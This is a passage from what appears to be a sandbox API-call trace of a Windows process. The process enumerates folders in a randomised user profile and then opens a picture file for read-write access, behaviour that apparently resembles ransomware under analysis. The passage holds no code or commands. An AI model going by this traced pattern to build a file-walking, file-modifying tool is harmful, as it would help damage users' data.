ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0172.771] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Content", cAlternateFileName="")) returned 1 [0172.771] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0172.772] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0172.772] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b461d0 | out: hHeap=0xcd0000) returned 1 [0172.772] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0172.772] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0172.772] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IME12\\") returned="IME12\\" [0172.772] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0172.772] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0172.772] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0172.772] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0172.772] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0172.772] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0172.772] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0172.772] PathFindFileNameW (pszPath="") returned="" [0172.772] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IME12\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0172.774] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.774] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0172.774] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0172.774] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0172.774] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0172.774] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed88 | out: hHeap=0xcd0000) returned 1 [0172.774] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0172.774] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0172.774] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP12\\") returned="IMJP12\\" [0172.774] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0172.774] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0172.774] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0172.774] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0172.774] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0172.775] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0172.775] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0172.775] PathFindFileNameW (pszPath="") returned="" [0172.775] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP12\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0172.775] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ce58 | out: hHeap=0xcd0000) returned 1 [0172.775] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0172.775] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0172.775] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0172.775] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0172.775] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.775] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0172.775] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0172.775] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP8_1\\") returned="IMJP8_1\\" [0172.776] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0172.776] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0172.776] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0172.776] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0172.776] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0172.776] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0172.776] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0172.776] PathFindFileNameW (pszPath="") returned="" [0172.776] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP8_1\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0172.776] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ce58 | out: hHeap=0xcd0000) returned 1 [0172.776] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0172.776] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0172.776] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0172.776] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0172.776] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.776] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0172.777] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0172.777] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP9_0\\") returned="IMJP9_0\\" [0172.777] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0172.777] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0172.777] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0172.777] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0172.777] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0172.777] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0172.777] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0172.777] PathFindFileNameW (pszPath="") returned="" [0172.777] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP9_0\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0172.777] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ce58 | out: hHeap=0xcd0000) returned 1 [0172.777] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0172.777] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0172.778] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0172.778] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0172.778] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd28 | out: hHeap=0xcd0000) returned 1 [0172.778] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0172.778] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0172.778] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0172.778] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0172.778] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0172.778] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0172.778] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0172.778] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0172.778] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0172.778] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0172.778] PathFindFileNameW (pszPath="") returned="" [0172.778] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5616fca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x5616fca0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0172.779] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45e88 | out: hHeap=0xcd0000) returned 1 [0172.779] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5616fca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x5616fca0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0172.779] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DOMStore", cAlternateFileName="")) returned 1 [0172.780] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0172.780] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0172.780] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b461d0 | out: hHeap=0xcd0000) returned 1 [0172.780] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0172.780] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0172.780] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0172.780] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0172.780] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0172.780] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0172.780] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0172.780] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0172.780] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0172.780] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0172.780] PathFindFileNameW (pszPath="") returned="" [0172.780] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0172.781] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ee10 | out: hHeap=0xcd0000) returned 1 [0172.781] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0172.781] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7eea3160, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7eec92c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eec92c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AU", cAlternateFileName="")) returned 1 [0172.782] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0172.782] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0172.782] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed88 | out: hHeap=0xcd0000) returned 1 [0172.782] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0172.782] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0172.782] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\C v_S8 I6B\\") returned="C v_S8 I6B\\" [0172.782] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\") returned="YD0LTf1VnnELtRyQ6\\" [0172.782] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\") returned="js4wnFUoxs42X9Y0mylB\\" [0172.782] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0172.782] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0172.782] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0172.782] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0172.782] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0172.782] PathFindFileNameW (pszPath="") returned="" [0172.783] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\C v_S8 I6B\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe2441270, ftCreationTime.dwHighDateTime=0x1d5e53f, ftLastAccessTime.dwLowDateTime=0x18ea4600, ftLastAccessTime.dwHighDateTime=0x1d5e2a7, ftLastWriteTime.dwLowDateTime=0x18ea4600, ftLastWriteTime.dwHighDateTime=0x1d5e2a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0172.783] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609ee0 | out: hHeap=0xcd0000) returned 1 [0172.783] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe2441270, ftCreationTime.dwHighDateTime=0x1d5e53f, ftLastAccessTime.dwLowDateTime=0x18ea4600, ftLastAccessTime.dwHighDateTime=0x1d5e2a7, ftLastWriteTime.dwLowDateTime=0x18ea4600, ftLastWriteTime.dwHighDateTime=0x1d5e2a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0172.783] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8bee540, ftCreationTime.dwHighDateTime=0x1d5db7e, ftLastAccessTime.dwLowDateTime=0x8c795f60, ftLastAccessTime.dwHighDateTime=0x1d5e3e8, ftLastWriteTime.dwLowDateTime=0x8c795f60, ftLastWriteTime.dwHighDateTime=0x1d5e3e8, nFileSizeHigh=0x0, nFileSizeLow=0xf23d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ASf5fAM9fGnGvxI4jO.gif", cAlternateFileName="ASF5FA~1.GIF")) returned 1 [0172.783] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\C v_S8 I6B\\ASf5fAM9fGnGvxI4jO.gif") returned=".gif" [0172.783] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\C v_S8 I6B\\ASf5fAM9fGnGvxI4jO.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\yd0ltf1vnneltryq6\\c v_s8 i6b\\asf5fam9fgngvxi4jo.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 